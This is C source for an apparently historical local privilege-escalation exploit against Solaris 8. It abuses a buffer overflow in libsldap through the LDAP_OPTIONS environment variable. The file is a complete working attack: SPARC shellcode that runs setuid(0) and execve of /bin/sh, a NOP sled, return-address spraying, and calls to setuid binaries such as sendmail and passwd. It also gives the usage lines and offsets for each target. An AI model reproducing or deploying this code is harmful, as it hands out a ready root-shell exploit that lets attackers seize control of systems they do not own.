/* Copyright (c) 2001 ADM */
/* All Rights Reserved */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM */
/* The copyright notice above does not evidence any */
/* actual or intended publication of such source code. */
/* */
/* Title: Solaris libsldap exploit */
/* Tested under: Solaris 8 */
/* By: K2 */
/* Use: gcc -o sol-sldap sol-sldap.c */
/* ./sol-sldap -o 10000 */
/* SENDMAIL 4 LIFE *@!$()*@(#@$)$!!!@$ */
/* */
/* Note: LDAP_OPTIONS= will overflow many binaries */
/* sendmail,[yp,nis]passwd,chkey */
/* example command line args @ bottem... */
/* Thanx: cheez,ND,str,!ADM@$*(!#@$! */


#define BUFLEN 4000
#define NOPLEN 2000
#define ADDRLEN 1440
#define SAFES 16

#define OFFSET 0 /* default offset */
#define NOP 0x801bc00f /* xor %o7,%o7,%g0 */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shell[] =
/* setuid: [2000]*/
/* 0 */ "\x90\x1b\xc0\x0f" /* xor %o7,%o7,%o0 [2000]*/
/* 4 */ "\x82\x10\x20\x17" /* mov 23,%g1 [2000]*/
/* 8 */ "\x91\xd0\x20\x08" /* ta 8 [2000]*/
/* alarm: [2000]*/
/* 12 */ "\x90\x1b\xc0\x0f" /* xor %o7,%o7,%o0 [2000]*/
/* 16 */ "\x82\x10\x20\x1b" /* mov 27,%g1 [2000]*/
/* 20 */ "\x91\xd0\x20\x08" /* ta 8 [2000]*/
/* execve: [2000]*/
/* 24 */ "\x2d\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l6 */
/* 28 */ "\xac\x15\xa1\x6e" /* or %l6,%lo(0x2f62696e),%l6 */
/* 32 */ "\x2f\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l7 */
/* 36 */ "\x90\x0b\x80\x0e" /* and %sp,%sp,%o0 [2000]*/
/* 40 */ "\x92\x03\xa0\x08" /* add %sp,8,%o1 [2000]*/
/* 44 */ "\x94\x1b\xc0\x0f" /* xor %o7,%o7,%o2 [2000]*/
/* 48 */ "\x9c\x03\xa0\x10" /* add %sp,16,%sp [2000]*/
/* 52 */ "\xec\x3b\xbf\xf0" /* std %l6,[%sp-16] [2000]*/
/* 56 */ "\xd0\x23\xbf\xf8" /* st %o0,[%sp-8] [2000]*/
/* 60 */ "\xc0\x23\xbf\xfc" /* st %g0,[%sp-4] [2000]*/
/* 64 */ "\x82\x10\x20\x3b" /* mov 59,%g1 [2000]*/
/* 68 */ "\x91\xd0\x20\x08"; /* ta 8 [2000]*/

extern char *optarg;

unsigned long int
get_sp()
{
__asm__("or %sp,%sp,%i0");
}

int
main(int argc, char *argv[])
{
unsigned long int sp, addr,a1=2,a2=1,offset;
int c, i;
char *program, buf[BUFLEN+1],buf2[BUFLEN+1], *cp;
char dtdata[] = "LDAP_OPTIONS=";
char dtstr[] = "LDAP_OPTIONS=";
char egg[BUFLEN+1] = "EGG=";
char eggstr[] = "EGG=";

program = argv[0];
offset = OFFSET;

while ((c = getopt(argc, argv, "1:2:h:o:")) != EOF)
{
switch (c)
{
case 'o':
offset = (int) strtol(optarg, NULL, 0);
break;
case '1':
a1 = (int) strtol(optarg, NULL, 0);
break;
case '2':
a2 = (int) strtol(optarg, NULL, 0);
break;
default:
fprintf(stderr, "usage: %s [-o offset] "
"[-1 align1 (NOPS)] [-2 align2 (ADDRESS)]\n", program);
exit(1);
break;
}
}
memset(buf, '\xff', BUFLEN);
for (i = 0, cp = buf; i < NOPLEN / 4; i++)
{
*cp++ = (NOP >> 24) & 0xff;
*cp++ = (NOP >> 16) & 0xff;
*cp++ = (NOP >> 8) & 0xff;
*cp++ = (NOP >> 0) & 0xff;
}
memcpy(cp, shell, strlen(shell));
buf[NOPLEN+strlen(shell)] = '\0';

strcpy(egg+a1,buf);
memcpy(egg,eggstr,strlen(eggstr));
putenv(egg);

sp = get_sp();
addr = sp + offset;
addr &= 0xfffffff8;

for (i = 0, cp = buf2; i < ADDRLEN / 4; i++)
{

*cp++ = (addr >> 24) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 0) & 0xff;
}
buf2[ADDRLEN] = '\0';

strcpy(dtdata+a2,buf2);
memcpy(dtdata,dtstr,strlen(dtstr));
putenv(dtdata);

fprintf(stderr, "%%sp 0x%08lx offset %d --> return address 0x%08lx, strlen(buf2) %d\n", sp, offset, addr, strlen(buf2));

execl("/usr/lib/sendmail","sendmail", NULL); /* -o 10000 -1 4 */
// execl("/usr/bin/passwd","passwd", NULL); /* -o 10000 -1 2 */
// execl("/usr/bin/yppasswd","yppasswd", NULL); /* -o 10000 -1 4 */
// execl("/usr/bin/nispasswd","nispasswd", NULL); /* -o 10000 -1 3 */
// execl("/usr/bin/chkey","chkey",NULL); /* -o 10000 -1 3 -2 1 */
exit(1);
}